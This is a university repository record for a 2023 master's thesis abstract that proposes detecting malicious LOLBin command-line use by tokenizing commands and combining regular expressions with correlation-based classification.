Publication Date

Fall 2023

Degree Type

Thesis

Degree Name

Master of Science (MS)

Department

Computer Engineering

Advisor

Younghee Park; Bernardo Flores; Jun Liu

Abstract

The cybersecurity environment is constantly evolving as attackers deploy progressively advanced methodologies. The utilization of Living Off the Land Binaries (LOLBins) represents a notable strategy in which normal system utilities are exploited for the purpose of executing malicious actions. This approach poses difficulties in terms of both detection and mitigation. The primary objective of this study is to examine LOLBins, which are a specific category of tactics falling under the broader concept of ”Living Off the Land” (LOL). In LOLBins, malicious actors exploit pre-existing tools in order to maintain a covert presence and circumvent security measures. Defending against LOLBins is essential in modern cybersecurity, and strategies to detect and mitigate them have been developed. This work proposes a novel approach for identifying suspicious commands leading to malicious activities by treating user commands as token sets. We combined the use of regular expression with correlation-based methods to classify the user commands as malicious or benign. Using trained datasets for both malicious and benign commands, our model improves detection rates while minimizing false positives. The proposed detection framework is intended to be flexible, adaptable, and scalable across different operating systems and environments. By implementing dynamic dataset management, our system can readily incorporate new command pattern and adapt to emerging LOLBin attack variants. This feature facilitates the ease of training the model to detect new commands and tactics as they evolve in the threat landscape. Real-world scenarios validate our methodology, emphasizing the importance of command-line auditing in countering LOLBins’ threats.

Download

Share

COinS